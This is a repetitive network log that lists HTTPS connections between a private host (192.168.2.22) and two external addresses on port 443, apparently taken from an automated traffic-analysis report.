            Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49161
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
